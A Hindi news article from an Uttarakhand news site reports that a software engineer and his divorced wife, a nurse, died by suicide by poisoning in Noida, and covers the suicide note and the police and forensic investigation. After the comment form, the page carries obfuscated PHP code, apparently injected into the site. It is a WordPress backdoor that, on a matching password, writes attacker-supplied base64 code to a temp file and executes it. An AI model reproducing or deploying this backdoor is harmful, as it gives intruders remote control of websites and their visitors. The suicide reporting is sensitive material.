नोएडा: इंजीनियर पति और तलाकशुदा पत्नी ने जहरीला पदार्थ खाकर की आत्महत्या, सुसाइड नोट में किया इन बातों का जिक्र

Uttarakhand Press 26 September 2023: नोएडा में आईटी कंपनी में कार्यरत इंजीनियर पति और तलाकशुदा पत्नी ने सेक्टर-122 स्थित घर में सोमवार को जहरीला पदार्थ खाकर आत्महत्या कर ली। मौके से जहरीला पदार्थ और एक सुसाइड नोट मिला है। प्राथमिक जांच में दोनों के बीच करीब डेढ़ वर्ष पहले तलाक होने की बात सामने आई है।

पुलिस दोनों के मोबाइल और घर के आसपास लगे सीसीटीवी फुटेज की जांच कर रही है। साथ ही दोनों के परिजनों से बातचीत कर जानकारी जुटा रही है। सेक्टर-16 स्थित आईटी कंपनी में सॉफ्टवेयर इंजीनियर व मूलरूप से कंकरखेड़ा, मेरठ निवासी तरुण (35) सेक्टर-122 में रहते थे। सोमवार को वह परिजनों का फोन नहीं उठा रहे थे।

घरवालों ने गाजियाबाद के मुरादनगर निवासी रिश्तेदार सूरज को नोएडा स्थित तरुण के घर पर भेजा। वहां तरुण का शव फर्श पर पड़ा था। सूरज ने तुरंत इसकी सूचना पुलिस को दी। मौके पर पहुंची पुलिस ने घर के अंदर से ही तरुण के साथ उनकी तलाकशुदा पत्नी सरिता (30) का शव बरामद किया।

मूलरूप से मेरठ के जागृति विहार की निवासी सरिता निजी अस्पताल में चीफ नर्स थीं। पुलिस ने दोनों शवों को पोस्टमार्टम के लिए भेज दिया है। पुलिस को कमरे से एक सुसाइड नोट और जहरीले पदार्थ की खाली और भरी हुई डिब्बियां मिली हैं। पुलिस ने जहरीला पदार्थ खाकर दोनों के आत्महत्या करने की आशंका जताई है। डीसीपी हरीश चंदर ने कहा कि घटना की जानकारी परिजनों को दे दी गई है। सभी पहलुओं की जांच की जा रही है।

सुसाइड नोट में परेशान होने का जिक्र:
मौके से मिले सुसाइड नोट में परेशान होने और किसी को खुश नहीं करने की बात लिखी है। इसमें कुछ नामों का जिक्र करते हुए उनका ख्याल रखने की बात भी कही गई है। प्राथमिक जांच में पता चला है कि सुसाइड नोट तरुण ने लिखा है। हालांकि पुलिस सुसाइड नोट की पड़ताल कर रही है।

तलाक के बाद साथ होने की जांच जारी:
तरुण सेक्टर-122 में अकेले रहते थे। पुलिस तलाक के बाद दोनों साथ होने की जांच कर रही है। साथ ही यह भी पता लगाने का प्रयास कर रही है कि सरिता सोमवार को ही तरुण से मिली या वह दिनों से उसके साथ थी। पुलिस इस बात की भी तफ्तीश कर रही है कि ऐसी कौन सी परिस्थिति बनी जिसमें दोनों ने एकसाथ आत्महत्या करने का फैसला किया।

फॉरेंसिक टीम ने किया निरीक्षण:
डबल सुसाइड की सूचना मिलते ही मौके पर पहुंची फॉरेंसिक टीम ने साक्ष्य जुटाएं हैं। घटनास्थल से सुसाइड नोट और जहरीले पदार्थ की खाली व भरी हुई डिब्बियां मिली हैं। पुलिस अधिकारी पोस्टमार्टम रिपोर्ट आने के बाद स्थिति के स्पष्ट होने की बात कह रहे हैं।

Read Previous

Haldwani: नशा तस्करी से जुड़े 51 अपराधियों की संपत्ति जब्त करने की तैयारी, नैनीताल में सबसे अधिक अपराधी

Read Next

Cyber Crime In Uttarakhand: उत्तराखंड बना साइबर ठगों का अड्डा, अब STF ने संभाला मोर्चा, क्राइम खत्म करने के लिए रोड मैप तैयार

Leave a Reply

Your email address will not be published. Required fields are marked *

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}